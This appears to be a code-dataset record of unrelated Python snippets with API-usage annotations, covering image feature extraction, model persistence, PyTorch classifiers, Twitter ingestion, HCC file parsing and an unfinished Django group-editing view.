pi(10**8) | [
"numpy.random.rand"
] | [((192, 216), 'numpy.random.rand', 'np.random.rand', (['batch', '(2)'], {}), '(batch, 2)\n', (206, 216), True, 'import numpy as np\n')] |
import requests
import numpy as np
import torch
from PIL import Image
from io import BytesIO
from torch import nn
from keras.applications.vgg16 import VGG16
def get_image_array(data, labels, label_map):
scaled = nn.AdaptiveMaxPool2d((1200,1200))
x_train = np.zeros((len(labels), 1200*1200))
y_train = np.array([label_map[label] for label in labels])
x_test = np.zeros((len(data) - len(labels), 1200*1200))
for i, row in enumerate(data):
image_address = row['image_url']
image = requests.get(image_address)
grey_image = Image.open(BytesIO(image.content)).convert("L")
grey_image_arr = np.array(grey_image)
temp = torch.rand(1, grey_image_arr.shape[0], grey_image_arr.shape[1])
temp[0] = torch.from_numpy(grey_image_arr)
output = scaled(temp)[0].numpy()
flattened = np.ravel(output)
if i < len(labels):
x_train[i] = flattened
else:
x_test[i - len(labels)] = flattened
return x_train, y_train, x_test
def get_image_data(data, labels, label_map, batch_size=16):
scaled = nn.AdaptiveMaxPool2d((1200, 1200))
x_train = np.zeros((len(labels), 37*37*512))
y_train = np.array([label_map[label] for label in labels])
x_test = np.zeros((len(data) - len(labels), 37*37*512))
image_batch = np.zeros((batch_size, 3, 1200, 1200))
# load model
model = VGG16(include_top=False, input_shape=(1200,1200,3))
for i, row in enumerate(data):
image_address = row['image_url']
image = requests.get(image_address)
rgb = np.array(Image.open(BytesIO(image.content)).convert("RGB")).astype(np.float32)
channel_first = np.rollaxis(np.array(rgb), 2, 0)
scaled_image = scaled(torch.from_numpy(channel_first)).numpy()
image_batch[i % batch_size] = scaled_image
if i % batch_size == batch_size - 1:
channels_last = np.rollaxis(image_batch, 1, 4)
last_layers = model.predict_on_batch(channels_last)
batch_num = i // batch_size
for j in range(batch_size):
index = batch_num * batch_size + j
if index < len(labels):
x_train[index] = last_layers[j].ravel()
else:
x_test[index - len(labels)] = last_layers[j].ravel()
return x_train, y_train, x_test
def save_image_training_data(data, categories, labels):
# image based classifier
label_map = {}
for i, category in enumerate(categories):
label_map[category.lower()] = i
x_train, y_train, x_test = get_image_data(data, labels, label_map)
with open('x_train.npy', 'wb') as f:
np.save(f, x_train)
with open('y_train.npy', 'wb') as f:
np.save(f, y_train)
with open('x_test.npy', 'wb') as f:
np.save(f, x_test) | [
"keras.applications.vgg16.VGG16",
"numpy.rollaxis",
"io.BytesIO",
"requests.get",
"torch.from_numpy",
"numpy.array",
"numpy.zeros",
"numpy.ravel",
"numpy.save",
"torch.nn.AdaptiveMaxPool2d",
"torch.rand"
] | [((218, 252), 'torch.nn.AdaptiveMaxPool2d', 'nn.AdaptiveMaxPool2d', (['(1200, 1200)'], {}), '((1200, 1200))\n', (238, 252), False, 'from torch import nn\n'), ((315, 363), 'numpy.array', 'np.array', (['[label_map[label] for label in labels]'], {}), '([label_map[label] for label in labels])\n', (323, 363), True, 'import numpy as np\n'), ((1103, 1137), 'torch.nn.AdaptiveMaxPool2d', 'nn.AdaptiveMaxPool2d', (['(1200, 1200)'], {}), '((1200, 1200))\n', (1123, 1137), False, 'from torch import nn\n'), ((1201, 1249), 'numpy.array', 'np.array', (['[label_map[label] for label in labels]'], {}), '([label_map[label] for label in labels])\n', (1209, 1249), True, 'import numpy as np\n'), ((1328, 1365), 'numpy.zeros', 'np.zeros', (['(batch_size, 3, 1200, 1200)'], {}), '((batch_size, 3, 1200, 1200))\n', (1336, 1365), True, 'import numpy as np\n'), ((1395, 1448), 'keras.applications.vgg16.VGG16', 'VGG16', ([], {'include_top': '(False)', 'input_shape': '(1200, 1200, 3)'}), '(include_top=False, input_shape=(1200, 1200, 3))\n', (1400, 1448), False, 'from keras.applications.vgg16 import VGG16\n'), ((516, 543), 'requests.get', 'requests.get', (['image_address'], {}), '(image_address)\n', (528, 543), False, 'import requests\n'), ((638, 658), 'numpy.array', 'np.array', (['grey_image'], {}), '(grey_image)\n', (646, 658), True, 'import numpy as np\n'), ((674, 737), 'torch.rand', 'torch.rand', (['(1)', 'grey_image_arr.shape[0]', 'grey_image_arr.shape[1]'], {}), '(1, grey_image_arr.shape[0], grey_image_arr.shape[1])\n', (684, 737), False, 'import torch\n'), ((756, 788), 'torch.from_numpy', 'torch.from_numpy', (['grey_image_arr'], {}), '(grey_image_arr)\n', (772, 788), False, 'import torch\n'), ((850, 866), 'numpy.ravel', 'np.ravel', (['output'], {}), '(output)\n', (858, 866), True, 'import numpy as np\n'), ((1539, 1566), 'requests.get', 'requests.get', (['image_address'], {}), '(image_address)\n', (1551, 1566), False, 'import requests\n'), ((2681, 2700), 'numpy.save', 'np.save', (['f', 'x_train'], {}), '(f, x_train)\n', (2688, 2700), True, 'import numpy as np\n'), ((2750, 2769), 'numpy.save', 'np.save', (['f', 'y_train'], {}), '(f, y_train)\n', (2757, 2769), True, 'import numpy as np\n'), ((2818, 2836), 'numpy.save', 'np.save', (['f', 'x_test'], {}), '(f, x_test)\n', (2825, 2836), True, 'import numpy as np\n'), ((1696, 1709), 'numpy.array', 'np.array', (['rgb'], {}), '(rgb)\n', (1704, 1709), True, 'import numpy as np\n'), ((1912, 1942), 'numpy.rollaxis', 'np.rollaxis', (['image_batch', '(1)', '(4)'], {}), '(image_batch, 1, 4)\n', (1923, 1942), True, 'import numpy as np\n'), ((576, 598), 'io.BytesIO', 'BytesIO', (['image.content'], {}), '(image.content)\n', (583, 598), False, 'from io import BytesIO\n'), ((1747, 1778), 'torch.from_numpy', 'torch.from_numpy', (['channel_first'], {}), '(channel_first)\n', (1763, 1778), False, 'import torch\n'), ((1601, 1623), 'io.BytesIO', 'BytesIO', (['image.content'], {}), '(image.content)\n', (1608, 1623), False, 'from io import BytesIO\n')] |
# Copyright (c) 2019, NVIDIA CORPORATION.
from cudf import DataFrame
from cuspatial._lib.shapefile_reader import cpp_read_polygon_shapefile
def read_polygon_shapefile(filename):
"""Reads a pair of .shp and .shx files into a cudf DataFrame"""
result = cpp_read_polygon_shapefile(filename)
return (
DataFrame({"f_pos": result[0], "r_pos": result[1]}),
DataFrame({"x": result[2], "y": result[3]}),
)
| [
"cudf.DataFrame",
"cuspatial._lib.shapefile_reader.cpp_read_polygon_shapefile"
] | [((263, 299), 'cuspatial._lib.shapefile_reader.cpp_read_polygon_shapefile', 'cpp_read_polygon_shapefile', (['filename'], {}), '(filename)\n', (289, 299), False, 'from cuspatial._lib.shapefile_reader import cpp_read_polygon_shapefile\n'), ((321, 372), 'cudf.DataFrame', 'DataFrame', (["{'f_pos': result[0], 'r_pos': result[1]}"], {}), "({'f_pos': result[0], 'r_pos': result[1]})\n", (330, 372), False, 'from cudf import DataFrame\n'), ((382, 425), 'cudf.DataFrame', 'DataFrame', (["{'x': result[2], 'y': result[3]}"], {}), "({'x': result[2], 'y': result[3]})\n", (391, 425), False, 'from cudf import DataFrame\n')] |
import csv
import re
from pkg_resources import resource_filename as rscfn
def padded_cc(cc):
cc = cc.replace(".","_")
pz = "".join(["0"] *(3-len(cc.split("_")[0])))
return "{}{}".format(pz, cc)
def read_dx2cc(fn):
dx2cc = {}
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
reader = csv.reader(fp, delimiter="\t")
for row in reader:
row = [x.strip() for x in row]
cc = padded_cc(row[1])
dx2cc[row[0]] = "HHS_HCC{}".format(cc)
return dx2cc
def read_code2rxc(fn):
code2rxc = {}
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
reader = csv.reader(fp, delimiter="\t")
for row in reader:
row = [x.strip() for x in row]
pz = "".join(["0"] *(2-len(row[1])))
rxc = "RXC{}{}".format(pz, row[1])
code2rxc[row[0]] = rxc
return code2rxc
def read_coefn(fn):
coef = {}
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
reader = csv.reader(fp, delimiter=",")
header = next(reader)
for row in reader:
row = [x.strip() for x in row]
if row[0] == "":
continue
agegrp = row[0]
varname = row[1]
values = {"P": float(row[3]),
"G": float(row[4]),
"S": float(row[5]),
"B": float(row[6]),
"C": float(row[7])}
coef[agegrp+"_"+varname] = values
return coef
def read_hier(fn):
hiers = {}
pttr = r"%SET0\(CC=(\d+.?\d?).+%STR\((.+)\)\)"
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
for line in fp.readlines():
matches = re.findall(pttr, line)
if len(matches) < 1 or len(matches[0]) < 2:
continue
k = "HHS_HCC"+padded_cc(matches[0][0].strip())
v = ["HHS_HCC"+padded_cc(x.strip())
for x in matches[0][1].split(",")]
hiers[k] = v
return hiers
def read_label(fn):
labels = {}
pttr = r"(HHS_HCC|HHS_CC|RXC_)(\d+.?\d?)\s?=\"(.+)\""
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
for line in fp.readlines():
matches = re.findall(pttr, line)
if len(matches) < 1 or len(matches[0]) < 2:
continue
k = matches[0][0] + matches[0][1].strip()
v = matches[0][2].strip()
labels[k] = v
return labels
| [
"re.findall",
"csv.reader",
"pkg_resources.resource_filename"
] | [((252, 271), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (257, 271), True, 'from pkg_resources import resource_filename as rscfn\n'), ((574, 593), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (579, 593), True, 'from pkg_resources import resource_filename as rscfn\n'), ((937, 956), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (942, 956), True, 'from pkg_resources import resource_filename as rscfn\n'), ((1604, 1623), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (1609, 1623), True, 'from pkg_resources import resource_filename as rscfn\n'), ((2128, 2147), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (2133, 2147), True, 'from pkg_resources import resource_filename as rscfn\n'), ((319, 349), 'csv.reader', 'csv.reader', (['fp'], {'delimiter': '"""\t"""'}), "(fp, delimiter='\\t')\n", (329, 349), False, 'import csv\n'), ((641, 671), 'csv.reader', 'csv.reader', (['fp'], {'delimiter': '"""\t"""'}), "(fp, delimiter='\\t')\n", (651, 671), False, 'import csv\n'), ((1004, 1033), 'csv.reader', 'csv.reader', (['fp'], {'delimiter': '""","""'}), "(fp, delimiter=',')\n", (1014, 1033), False, 'import csv\n'), ((1713, 1735), 're.findall', 're.findall', (['pttr', 'line'], {}), '(pttr, line)\n', (1723, 1735), False, 'import re\n'), ((2237, 2259), 're.findall', 're.findall', (['pttr', 'line'], {}), '(pttr, line)\n', (2247, 2259), False, 'import re\n')] |
from argparse import ArgumentParser
from collections import OrderedDict
from logging import getLogger
from pathlib import Path
from typing import Generator
from typing import OrderedDict as OrderedDictType
from typing import Tuple
from general_utils import get_files_dict
from general_utils.main import get_files_tuples
from tqdm import tqdm
def add_overwrite_argument(parser: ArgumentParser) -> None:
parser.add_argument("-o", "--overwrite", action="store_true",
help="overwrite existing files")
TXT_FILE_TYPE = ".txt"
def get_text_files_tqdm(directory: Path) -> OrderedDictType[str, Path]:
return OrderedDict(tqdm(get_files_tuples(directory, filetypes={TXT_FILE_TYPE})))
def raise_error_if_directory_not_exists(directory: Path) -> bool:
if not directory.exists():
logger = getLogger(__name__)
logger.error(f"Directory \"{str(directory)}\" was not found!")
return True
return False
def raise_error_if_directory_exists_and_not_overwrite(directory: Path, overwrite: bool) -> bool:
if directory.exists() and not overwrite:
logger = getLogger(__name__)
logger.error(f"Directory \"{str(directory)}\" already exists!")
return True
return False
| [
"logging.getLogger",
"general_utils.main.get_files_tuples"
] | [((816, 835), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (825, 835), False, 'from logging import getLogger\n'), ((1090, 1109), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (1099, 1109), False, 'from logging import getLogger\n'), ((649, 703), 'general_utils.main.get_files_tuples', 'get_files_tuples', (['directory'], {'filetypes': '{TXT_FILE_TYPE}'}), '(directory, filetypes={TXT_FILE_TYPE})\n', (665, 703), False, 'from general_utils.main import get_files_tuples\n')] |
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from functools import partial
from pathlib import Path
from typing import Any
from modelstore.models.model_manager import ModelManager
from modelstore.storage.storage import CloudStorage
from modelstore.utils.log import logger
LEARNER_DIRECTORY = "learner"
LEARNER_FILE = "learner.pkl"
class FastAIManager(ModelManager):
"""
Model persistence for fastai models:
https://docs.fast.ai/learner.html#Learner.save
https://docs.fast.ai/learner.html#Learner.export
"""
NAME = "fastai"
def __init__(self, storage: CloudStorage = None):
super().__init__(self.NAME, storage)
def required_dependencies(self) -> list:
return ["fastai"]
def optional_dependencies(self) -> list:
deps = super(FastAIManager, self).optional_dependencies()
return deps + [
"matplotlib",
"pillow",
"torchvision",
"fastcore",
"sklearn",
"fastprogress",
"torch",
"spacy",
]
def _required_kwargs(self):
return ["learner"]
def matches_with(self, **kwargs) -> bool:
# pylint: disable=import-outside-toplevel
import fastai
if fastai.__version__.startswith("1.0"):
from fastai.basic_train import Learner
else:
from fastai.learner import Learner
return isinstance(kwargs.get("learner"), Learner)
def _get_functions(self, **kwargs) -> list:
if not self.matches_with(**kwargs):
raise TypeError("learner is not a fastai Learner!")
return [
partial(_save_model, learner=kwargs["learner"]),
partial(_export_model, learner=kwargs["learner"]),
]
def load(self, model_path: str, meta_data: dict) -> Any:
# pylint: disable=import-outside-toplevel
import fastai
if fastai.__version__.startswith("1.0"):
from fastai.basic_train import load_learner
else:
from fastai.learner import load_learner
version = meta_data["code"].get("dependencies", {}).get("fastai", "?")
if version != fastai.__version__:
logger.warn(
"Model was saved with fastai==%s, trying to load it with fastai==%s",
version,
fastai.__version__,
)
model_file = _model_file_path(model_path)
return load_learner(model_file)
def _model_file_path(parent_dir: str) -> str:
return os.path.join(parent_dir, LEARNER_FILE)
def _save_model(tmp_dir: str, learner: "fastai.learner.Leader") -> str:
# learner.save(file) will write to: self.path/self.model_dir/file;
learner_path = learner.path
learner.path = Path(tmp_dir)
file_path = learner.save(LEARNER_DIRECTORY, with_opt=True)
# Revert value
learner.path = learner_path
return str(file_path)
def _export_model(tmp_dir: str, learner: "fastai.learner.Leader") -> str:
# learner.export(file) will write to: self.path/fname
learner_path = learner.path
learner.path = Path(tmp_dir)
learner.export(LEARNER_FILE)
# Revert value
learner.path = learner_path
return _model_file_path(tmp_dir)
| [
"fastai.learner.load_learner",
"pathlib.Path",
"os.path.join",
"functools.partial",
"fastai.__version__.startswith",
"modelstore.utils.log.logger.warn"
] | [((3101, 3139), 'os.path.join', 'os.path.join', (['parent_dir', 'LEARNER_FILE'], {}), '(parent_dir, LEARNER_FILE)\n', (3113, 3139), False, 'import os\n'), ((3336, 3349), 'pathlib.Path', 'Path', (['tmp_dir'], {}), '(tmp_dir)\n', (3340, 3349), False, 'from pathlib import Path\n'), ((3677, 3690), 'pathlib.Path', 'Path', (['tmp_dir'], {}), '(tmp_dir)\n', (3681, 3690), False, 'from pathlib import Path\n'), ((1819, 1855), 'fastai.__version__.startswith', 'fastai.__version__.startswith', (['"""1.0"""'], {}), "('1.0')\n", (1848, 1855), False, 'import fastai\n'), ((2483, 2519), 'fastai.__version__.startswith', 'fastai.__version__.startswith', (['"""1.0"""'], {}), "('1.0')\n", (2512, 2519), False, 'import fastai\n'), ((3017, 3041), 'fastai.learner.load_learner', 'load_learner', (['model_file'], {}), '(model_file)\n', (3029, 3041), False, 'from fastai.learner import load_learner\n'), ((2215, 2262), 'functools.partial', 'partial', (['_save_model'], {'learner': "kwargs['learner']"}), "(_save_model, learner=kwargs['learner'])\n", (2222, 2262), False, 'from functools import partial\n'), ((2276, 2325), 'functools.partial', 'partial', (['_export_model'], {'learner': "kwargs['learner']"}), "(_export_model, learner=kwargs['learner'])\n", (2283, 2325), False, 'from functools import partial\n'), ((2777, 2896), 'modelstore.utils.log.logger.warn', 'logger.warn', (['"""Model was saved with fastai==%s, trying to load it with fastai==%s"""', 'version', 'fastai.__version__'], {}), "(\n 'Model was saved with fastai==%s, trying to load it with fastai==%s',\n version, fastai.__version__)\n", (2788, 2896), False, 'from modelstore.utils.log import logger\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import torch
import torch.nn as nn
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class ConvNNCifar10(nn.Module):
"""Convolutional Neural Net for Classification
"""
def __init__(self,num_classes):
super(ConvNNCifar10, self).__init__()
self.num_classes = num_classes
def blockLinear(in_features,out_features):
Layers = [nn.Linear(in_features,out_features)]
Layers.append(nn.BatchNorm1d(out_features))
Layers.append(nn.ReLU())
return Layers
def blockConv2D(in_channels, out_channels, kernel_size, stride, padding):
Layers = [nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=padding)]
Layers.append(nn.BatchNorm2d(out_channels))
Layers.append(nn.ReLU())
return Layers
self.model = nn.Sequential(
*blockConv2D(3,16,7,1,2),
*blockConv2D(16,32,6,2,2),
*blockConv2D(32,64,5,1,2),
*blockConv2D(64,64,5,2,2),
Flatten(),
*blockLinear(4096,64),
*blockLinear(64,32),
nn.Linear(32,num_classes)
)
def forward(self,x):
return self.model(x)
class ConvNNMNIST(nn.Module):
"""Convolutional Neural Net for Classification
"""
def __init__(self,num_classes):
super(ConvNNMNIST, self).__init__()
self.num_classes = num_classes
def blockLinear(in_features,out_features):
Layers = [nn.Linear(in_features,out_features)]
Layers.append(nn.BatchNorm1d(out_features))
Layers.append(nn.ReLU())
return Layers
def blockConv2D(in_channels, out_channels, kernel_size, stride, padding):
Layers = [nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=padding)]
Layers.append(nn.BatchNorm2d(out_channels))
Layers.append(nn.ReLU())
return Layers
self.model = nn.Sequential(
*blockConv2D(1,16,7,1,2),
*blockConv2D(16,32,6,2,2),
*blockConv2D(32,64,5,1,2),
*blockConv2D(64,64,5,2,2),
Flatten(),
*blockLinear(3136,64),
*blockLinear(64,32),
nn.Linear(32,num_classes)
)
def forward(self,x):
return self.model(x)
class PenDigNN(nn.Module):
"""Fully-connected Neural Net for Classification
"""
def __init__(self,input_size):
super(PenDigNN, self).__init__()
def blockLinear(in_features,out_features):
Layers = [nn.Linear(in_features,out_features)]
Layers.append(nn.BatchNorm1d(out_features))
Layers.append(nn.ReLU())
return Layers
self.layer1 = nn.Sequential(
*blockLinear(input_size,32)
)
self.layer2 = nn.Sequential(
*blockLinear(32,16)
)
self.layer3 = nn.Sequential(
*blockLinear(16,16)
)
self.layer4 = nn.Linear(16,10)
def forward(self,images,ids,strokes,time):
images = torch.reshape(images,(-1,64))
strokes = torch.unsqueeze(strokes,1)
time = torch.unsqueeze(time,1)
in1 = torch.cat((images,ids,strokes,time),dim=1)
out1 = self.layer1(in1)
out2 = self.layer2(out1)
out3 = self.layer3(out2)
return self.layer4(out3)
| [
"torch.nn.BatchNorm2d",
"torch.nn.ReLU",
"torch.unsqueeze",
"torch.nn.Conv2d",
"torch.nn.BatchNorm1d",
"torch.nn.Linear",
"torch.reshape",
"torch.cat"
] | [((3148, 3165), 'torch.nn.Linear', 'nn.Linear', (['(16)', '(10)'], {}), '(16, 10)\n', (3157, 3165), True, 'import torch.nn as nn\n'), ((3238, 3269), 'torch.reshape', 'torch.reshape', (['images', '(-1, 64)'], {}), '(images, (-1, 64))\n', (3251, 3269), False, 'import torch\n'), ((3286, 3313), 'torch.unsqueeze', 'torch.unsqueeze', (['strokes', '(1)'], {}), '(strokes, 1)\n', (3301, 3313), False, 'import torch\n'), ((3328, 3352), 'torch.unsqueeze', 'torch.unsqueeze', (['time', '(1)'], {}), '(time, 1)\n', (3343, 3352), False, 'import torch\n'), ((3366, 3412), 'torch.cat', 'torch.cat', (['(images, ids, strokes, time)'], {'dim': '(1)'}), '((images, ids, strokes, time), dim=1)\n', (3375, 3412), False, 'import torch\n'), ((1215, 1241), 'torch.nn.Linear', 'nn.Linear', (['(32)', 'num_classes'], {}), '(32, num_classes)\n', (1224, 1241), True, 'import torch.nn as nn\n'), ((2343, 2369), 'torch.nn.Linear', 'nn.Linear', (['(32)', 'num_classes'], {}), '(32, num_classes)\n', (2352, 2369), True, 'import torch.nn as nn\n'), ((481, 517), 'torch.nn.Linear', 'nn.Linear', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (490, 517), True, 'import torch.nn as nn\n'), ((544, 572), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (558, 572), True, 'import torch.nn as nn\n'), ((600, 609), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (607, 609), True, 'import torch.nn as nn\n'), ((742, 828), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels', 'kernel_size'], {'stride': 'stride', 'padding': 'padding'}), '(in_channels, out_channels, kernel_size, stride=stride, padding=\n padding)\n', (751, 828), True, 'import torch.nn as nn\n'), ((851, 879), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (865, 879), True, 'import torch.nn as nn\n'), ((907, 916), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (914, 916), True, 'import torch.nn as nn\n'), ((1609, 1645), 'torch.nn.Linear', 'nn.Linear', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (1618, 1645), True, 'import torch.nn as nn\n'), ((1672, 1700), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (1686, 1700), True, 'import torch.nn as nn\n'), ((1728, 1737), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (1735, 1737), True, 'import torch.nn as nn\n'), ((1870, 1956), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels', 'kernel_size'], {'stride': 'stride', 'padding': 'padding'}), '(in_channels, out_channels, kernel_size, stride=stride, padding=\n padding)\n', (1879, 1956), True, 'import torch.nn as nn\n'), ((1979, 2007), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (1993, 2007), True, 'import torch.nn as nn\n'), ((2035, 2044), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (2042, 2044), True, 'import torch.nn as nn\n'), ((2693, 2729), 'torch.nn.Linear', 'nn.Linear', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (2702, 2729), True, 'import torch.nn as nn\n'), ((2756, 2784), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (2770, 2784), True, 'import torch.nn as nn\n'), ((2812, 2821), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (2819, 2821), True, 'import torch.nn as nn\n')] |
# Copyright The OpenTelemetry Authors
# SPDX-License-Identifier: Apache-2.0
import pytest
from utils import assertTest
pytest_plugins = ["pytester"]
common_code = """
import os
import time
import logging
import pytest
"""
def test_skip_plugin(pytester, otel_service):
"""test a skipped test"""
pytester.makepyfile(
common_code
+ """
@pytest.mark.skip
def test_skip():
assert True
""")
assertTest(pytester, None, "passed", "STATUS_CODE_OK", None, None)
| [
"utils.assertTest"
] | [((423, 489), 'utils.assertTest', 'assertTest', (['pytester', 'None', '"""passed"""', '"""STATUS_CODE_OK"""', 'None', 'None'], {}), "(pytester, None, 'passed', 'STATUS_CODE_OK', None, None)\n", (433, 489), False, 'from utils import assertTest\n')] |
import flask
from os import getenv, name
from .models import db, Tweet, User
import tweepy
import spacy
# Authenticates us and allows us to use the Twitter API
TWITTER_API_KEY = getenv("TWITTER_API_KEY")
TWITTER_API_KEY_SECRET = getenv("TWITTER_API_SECRET")
TWITTER_AUTH = tweepy.OAuthHandler(TWITTER_API_KEY, TWITTER_API_KEY_SECRET)
api = tweepy.API(TWITTER_AUTH)
def add_or_update_user(username):
twitter_user = api.get_user(username)
db_user = User.query.get(twitter_user.id) or User(id=twitter_user.id, name=username)
db.session.add(db_user)
tweets = twitter_user.timeline(
count=200,
exclude_replies=True,
include_rts=False,
tweet_mode="extended",
since_id=db_user.newest_tweet_id
)
if tweets:
db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
db_tweet = Tweet(id=tweet.id, text=tweet.full_text)
db_user.tweets.append(db_tweet)
db.session.add(db_tweet)
db.session.commit()
def update_all_users():
"""Update all existing users."""
for user in User.query.all():
add_or_update_user(user.name) | [
"tweepy.API",
"os.getenv",
"tweepy.OAuthHandler"
] | [((186, 211), 'os.getenv', 'getenv', (['"""TWITTER_API_KEY"""'], {}), "('TWITTER_API_KEY')\n", (192, 211), False, 'from os import getenv, name\n'), ((238, 266), 'os.getenv', 'getenv', (['"""TWITTER_API_SECRET"""'], {}), "('TWITTER_API_SECRET')\n", (244, 266), False, 'from os import getenv, name\n'), ((285, 345), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['TWITTER_API_KEY', 'TWITTER_API_KEY_SECRET'], {}), '(TWITTER_API_KEY, TWITTER_API_KEY_SECRET)\n', (304, 345), False, 'import tweepy\n'), ((353, 377), 'tweepy.API', 'tweepy.API', (['TWITTER_AUTH'], {}), '(TWITTER_AUTH)\n', (363, 377), False, 'import tweepy\n')] |
import torch
from common.utils.clip_pad import *
class BatchCollator(object):
def __init__(self, dataset, phrase_cls=False, append_ind=False):
self.dataset = dataset
self.test_mode = self.dataset.test_mode
self.data_names = self.dataset.data_names
self.append_ind = append_ind
self.phrase_cls = phrase_cls
def __call__(self, batch):
if not isinstance(batch, list):
batch = list(batch)
max_shape = tuple(max(s) for s in zip(*[data[self.data_names.index('image')].shape for data in batch]))
max_boxes = max([data[self.data_names.index('boxes')].shape[0] for data in batch])
max_caption1_length = max([len(data[self.data_names.index('caption1')]) for data in batch])
max_caption2_length = max([len(data[self.data_names.index('caption2')]) for data in batch])
if self.phrase_cls and 'label' in self.data_names:
max_label_length = max([len(data[self.data_names.index('label')]) for data in batch])
max_n_phrases = max([data[self.data_names.index('caption1')].shape[1] for data in batch]) - 2
for i, ibatch in enumerate(batch):
out = {}
image = ibatch[self.data_names.index('image')]
out['image'] = clip_pad_images(image, max_shape, pad=0)
boxes = ibatch[self.data_names.index('boxes')]
out['boxes'] = clip_pad_boxes(boxes, max_boxes, pad=-1)
caption1 = ibatch[self.data_names.index('caption1')]
caption2 = ibatch[self.data_names.index('caption2')]
dimension_caption1 = 2 + max_n_phrases if self.phrase_cls else len(caption1[0])
dimension_caption2 = 2 + max_n_phrases if self.phrase_cls else len(caption2[0])
out['caption1'] = clip_pad_2d(caption1, (max_caption1_length, dimension_caption1), pad=0)
out['caption2'] = clip_pad_2d(caption2, (max_caption2_length, dimension_caption2), pad=0)
out['im_info'] = ibatch[self.data_names.index('im_info')]
if 'label' in self.data_names:
out['label'] = ibatch[self.data_names.index('label')]
if self.phrase_cls:
label = ibatch[self.data_names.index('label')]
out['label'] = clip_pad_2d(label, (max_label_length, len(label[0])), pad=-1)
other_names = [data_name for data_name in self.data_names if data_name not in out]
for name in other_names:
out[name] = torch.as_tensor(ibatch[self.data_names.index(name)])
batch[i] = tuple(out[data_name] for data_name in self.data_names)
if self.append_ind:
batch[i] += (torch.tensor(i, dtype=torch.int64),)
out_tuple = ()
for k, items in enumerate(zip(*batch)):
if isinstance(items[0], torch.Tensor):
out_tuple += (torch.stack(tuple(items), dim=0), )
else:
out_tuple += (list(items), )
return out_tuple
| [
"torch.tensor"
] | [((2718, 2752), 'torch.tensor', 'torch.tensor', (['i'], {'dtype': 'torch.int64'}), '(i, dtype=torch.int64)\n', (2730, 2752), False, 'import torch\n')] |
# Group info
# Groups and Users
from django.contrib.auth.models import Group, User
# Responses
from rest_framework import status
from rest_framework.response import Response
# For getting objects out of the database.
from ..utilities import DbUtils
# Checking that a user is in a group.
from ..utilities import UserUtils
from ...models import group_info
def POST_api_groups_modify(request):
# Instantiate any necessary imports.
db = DbUtils.DbUtils()
uu = UserUtils.UserUtils()
# Define the bulk request.
bulk_request = request.data['POST_api_groups_modify']
# Establish who has made the request.
requestor_info = uu.user_from_request(rq=request)
# Get all group names.
# This is a better solution than querying for
# each individual group name.
groups = list(Group.objects.all().values_list('name', flat=True))
# Construct an array to return information about processing
# the request.
returning = []
# Since bulk_request is an array, go over each
# item in the array.
for modification_object in bulk_request:
# Standardize the group name.
standardized = modification_object['name'].lower()
if standardized in groups:
# Get the group and its information.
grouped = Group.objects.get(name=standardized)
import pdb; pdb.set_trace()
# Check that the requestor is the group admin.
if requestor_info.is_superuser == True or grouped in requestor_info.groups.all():
try:
group_information = group_info.objects.get(group=grouped)
except:
group_information = group_info.objects.create(group=grouped, owner_user=requestor_info)
# Process the request.
# We only care about the actions at this point.
if 'actions' in modification_object:
# Set the working object to the actions.
action_set = modification_object['actions']
# Invalid inputs don't throw 400, 401, or 403 for the
# request. That is, provided parameters that don't
# exist (for example, an owner_user that does not exist)
# simply get skipped over.
# First do the "easy" tasks - name and description.
# Change name of group if set in actions
if 'rename' in action_set:
# Simply re-name to whatever we've been provided,
# assuming the group doesn't already exist.
if action_set['rename'] not in groups:
grouped.name = action_set['rename']
grouped.save()
# Change description of group if set in actions.
if 'redescribe' in action_set:
group_information.description = action_set['redescribe']
group_information.save()
# Now the ownership tasks.
# TODO: Is owner_group defined for this type of object?
# Does not appear to be set, also does not appear to be inherited.
# WARNING: This could cause an error if this is sent in!
if 'owner_group' in action_set:
